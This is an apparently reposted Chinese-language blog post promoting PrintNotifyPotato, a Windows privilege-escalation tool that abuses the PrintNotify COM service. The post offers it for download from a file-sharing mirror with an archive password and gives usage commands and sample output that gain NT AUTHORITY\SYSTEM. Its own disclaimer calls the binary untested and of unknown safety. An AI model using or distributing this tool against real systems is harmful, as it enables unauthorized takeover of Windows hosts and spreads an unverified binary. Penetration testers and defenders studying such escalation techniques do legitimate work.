PrintNotifyPotato windows priviledge 提权工具

PrintNotifyPotato windows priviledge 提权工具

PrintNotifyPotato简介

又一个土豆,使用PrintNotify COM服务进行提权

适用于
Windows 10 – 11
Windows Server 2012 – 2022

PrintNotifyPotato下载地址

云中转下载地址:
yunzhongzhuan.com/#sharefile=vjJOpwil_112919
解压密码:www.ddosi.org

PrintNotifyPotato windows priviledge 提权工具

使用方法:


C:\Windows\Temp >PrintNotifyPotato.exe 

aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa    aaaaaaa     aaaaaaa    aaa   aaaa  
 aaaaaaaaaaa   aaaaaaaaa   aaaaaaaaa   aaa  aaaa   
 aaaaaaaaaaa  aaaa   aaa  aaaa   aaaa  aaa aaaa    
 aaaa    aaa         aaa  aaaa   aaaa  aaaaaaa     
 aaaa    aaa     aaaaaaa  aaa          aaaaaaa     
 aaaa    aaa   aaaaaaaaa  aaa          aaaaaaaa    
 aaaa    aaa  aaaa   aaa  aaa     aaa  aaaa aaa    
 aaaa    aaa  aaa   aaaa  aaaa   aaaa  aaa  aaaa   
 aaaa    aaa  aaa  aaaaa   aaaa  aaaa  aaa   aaaa  
 aaaa    aaa  aaaaaaaaaa    aaaaaaaa   aaa    aaa  
 aaaa    aaa    aaaa aaaa    aaaaa     aaa    aaaa 

Github: https://github.com/BeichenDream/PrintNotifyPotato

Example:
            PrintNotifyPotato.exe whoami
            PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe  whoami

[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >

项目地址:

github.com/BeichenDream/PrintNotifyPotato

参考

code.google.com/p/google-security-research/issues/detail?id=128

zcgonvh

github.com/antonioCoco/JuicyPotatoNG

注意事项

工具未进行测试,安全性未知,自行判断或仅放在虚拟机中进行测试.
本文仅作个人学习记录,涉及技术仅供学习参考,禁止用于其他!!!未经授权请勿利用文章中提及的技术对任何计算机系统进行非法攻击。利用此文所提供的技术而造成的直接或间接后果和损失,均由使用者本人负责。

转载请注明出处及链接

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用 * 标注